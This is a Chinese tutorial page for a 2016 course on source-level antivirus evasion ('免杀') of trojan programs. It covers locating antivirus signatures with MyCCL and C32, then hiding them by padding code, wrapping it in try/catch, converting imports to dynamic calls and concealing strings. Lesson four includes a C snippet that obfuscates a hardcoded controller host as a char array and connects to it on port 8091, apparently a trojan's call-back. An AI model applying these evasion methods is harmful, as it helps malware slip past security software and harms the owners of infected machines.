教程详情
文件下载 | 文件名称:2016年小七免杀论坛源码免杀培训系列课程 | 文件大小:124.27MB |
| 下载声明:本站文件大多来自于网络,仅供学习和研究使用,不得用于商业用途,如有版权问题,请联系博猪! | ||
| 下载地址: 下载教程 | ||
教程目录:
第一课 【安装工具以及虚拟机搭建】
本系列课程由浅入深讲解以及实战!因为没有麦不能语音了。教程都是从基本的开始操作,如果会了的,可以快进了,或者直接进入后面的教程。
1.安装VC编译软件
我们在做源码免杀之前都是必需一些常用的工具,比如VC编译器等。下面我们先来安装编译器,安装包我已经下载好了,大家可以自己百度下载即可,大家看操作,继续,好了,VC6已经安装好了,那么接着就是更新SDK了,找到安装目录覆盖,到这里差不多完成了,还有一个就是安装VC助手,这个可根据大家需要安装吧。好了打开编译器,这个就是界面了,我就不做多介绍了。
2.安装虚拟机
这里我就不演示了,大家可根据自己电脑配置安装什么版本的VM,百度搜索下就出来一堆了,建议大家安装英文版的,因为比较稳定,或者安装最新的版本也行,不过需要安装汉化包。
好了,我们的第一节就是说的这么多,下节课我们就开始讲免杀的一些基本的方法了。
下节课见!88
第二课 【如何定位特征码】
以下是一些常用的定位方法
myccl定位工具
multiCCL定位工具
手工定位
判断定位
.text 代码段
.rdata 输入表
.data 字符串
.rsrc 资源
首先我们来看第一个吧,这里就简单介绍下就行,分块数量自己定夺,一般不超过30吧,开始位置都是1000开头,这里我不建议1000,因为杀毒软件订太紧了,所以大家可以多加点数字比如1011.1033等,其他的默认就行,然后就是开始定位了,生成出来一个文件,拖到杀毒软件查杀,杀到那个文件直接删除然后再生成,反复定位到长度为1,2.3的时候,特征码的位置就出来了,有些可能会偏移几个字节位置。
这两个第一个是文件定位工具,第二个是内存定位工具,这里不做多介绍了。
手工定位对于干扰厉害的杀软很有效,和判断一起操作,时间会缩短些,我就演示给大家看下,这里要说下判断特征码在什么区段,我们一个个区段来填充,填充了那个不杀了就在那个区段, 如果特征码在代码段,那么我们用C32来定位,代码的开始位置填充法,填充后再查杀,一直填充到不杀为止,第二种方法就是直接用工具来定位了。先记录下区段的位置,然后在工具的开始位置和结束位置填上。
其实定位的方法很多,大家也不一定按照我的方法去做,什么方法快就用什么方法。我给大家的只是一些经验和思路。
好了,这节课就到这里,88
第三课 【如何在源码里面查找特征码位置】
这课简单给大家讲下如何查找特征码,首先我们先编译一下DAT的源码,设置。产生MAP文件勾上,这样我们就看到一个map文件了,那么先说第一个吧。
代码段的特征码,我就随便找一处给大家演示,代码的我们一般载入OD查看,这些就是入口位置了,我来找一处地方吧。这里搜索到两处地方,一般我们都是往上看的是在什么代码里面,就是在这里里面了,我们再换一处看看,这里有四处地方,这个就是代码的查找。
输入表函数的查找,载入C32查看,这里就是输入表的位置了,假如定位在这个函数上面WideCharToMultiByte,直接复制代码里面搜索即可,换一个,找到了,GetCurrentProcessId,其实对于函数的查找是很容易的。
字符串的查找,也是在C32里面查看,这些就是字符串了,我们来搜索那个文字的,这些都是很容易找到的,一定要加双斜杠,不然会搜索不到的,对把。
最后一个就是资源了,这些就是资源的代码了。
一般我们在定位的时候资源我们都是先删除,不然会干扰到定位的,而且会死循环。
好了,今天的课程就是这些了,如果大家有不懂的,可以论坛发帖提问。
下节课我们就讲解对于特征码的修改,也就是在源码里面如何修改。
第四课 【代码段的修改】
上节课我们讲了如何查找特征码,那么这节课就讲下代码段的修改,我们来打开源码。
我们对于代码的修改最常用的手法也就几种。
Sleep(0);
Sleep(0);
Sleep(0); 延迟0
加这个是不影响程序运行的。
再来看下try,卡住了 用辅助工具来完成快点,
try
{
if(1+1==2)throw 15;
}
catch (...)
{
char chIP[128]={0},chPort[128]={0},*ip=NULL;
char Admin_Host[] = {'w','w','w','.','c','c','t','v','-','c','c','.','n','e','t','\0'};
struct sockaddr_in LocalAddr;
LocalAddr.sin_family=AF_INET;
LocalAddr.sin_port=htons(8091);
LocalAddr.sin_addr.S_un.S_addr=ResolvDNS(Admin_Host);
//连接的socket
SOCKET MySocket = socket(AF_INET, SOCK_STREAM, 0);
if(connect(MySocket,(PSOCKADDR)&LocalAddr,sizeof(LocalAddr)) == SOCKET_ERROR)
{
closesocket(MySocket);
return SOCKET_ERROR;
}
}
以上这段代码已经是try的了,
还有一个就是加花指令的,nop;不过这个方法杀软订太紧了,对于360杀毒来说是没有效的,其他的杀软也就不是很清楚了,我们常用的也就是上面的两种方法,编译是没问题的,那么运行肯定也是没问题的,电脑烂卡死了。
上线什么的都是问题的。
第五课 【输入表函数的修改】
当我们定位到输入表函数的时候,却不知道怎么去修改,那么今天我们就来讲解怎么处理,
先打开源码编译一个DAT,用到的工具C32,还有源码辅助工具,先载入C32查看特征码位置,是定位到什么函数上面了,比如我们定位在这个LoadLibraryA函数上面,那么我们在源码里面搜索的时候,后面带A的要去掉,不然是搜索不到的,看到了吧带A是搜索不到的,这个是动态调用的函数,我们来换一个,GetModuleFileNameA
搜索到两处,有一处已经是注销掉的,不需要管了,我们来看下面那个。鼠标放在函数上,右键点击转到定义,我们把这个函数的定义复制下来,用到辅助工具来,点动态调用粘贴进去即可,点生成,复制下面的代码,一般定义我们都是放在代码的前面,然后复制那个函数替换掉原来的函数,这样就算完成了,来编译下,嗯,没错,我们在来看下这个函数是不是没有了,OK,我们再来演示一个,RegOpenKeyA就这个了,ok,再来看看这个函数是不是被调用了,已经不见了。
好了今天就讲这么多,大家自己多多练习,不懂的论坛发帖吧。
第六课 【字符串的修改】
这节课简单的讲下字符串的修改把,其实对于字符串的改法常用的也是几种方法,那么我们先来讲第一种吧。
字符串的隐藏,大家看我操作,这些就是字符串了,我们来找一段给大家演示,Yow! Bad host lookup
找到两个,我们来看下是不是隐藏了,没有看到了是把。我们来换一个,这个不能隐藏。那些都不能隐藏的,
字符串的连接,刚才漏掉了前面的,ok,再来看看,好了。
字符串的修改常用的两种改法,我就给大家演示这么多了,如果大家有什么不懂的,论坛发帖吧。
教程截图
教程下载
原文链接:【教程宝盒网】 https://www.jc-box.com/5601.html,转载请注明出处。
![道德网安-[贵宾免杀班]菜鸟免杀教程](https://www.jc-box.com/wp-content/uploads/2022/04/4a47a0db6e60853dedfcfdf08a5ca249-54.png?x-oss-process=style/sythum)
请先 !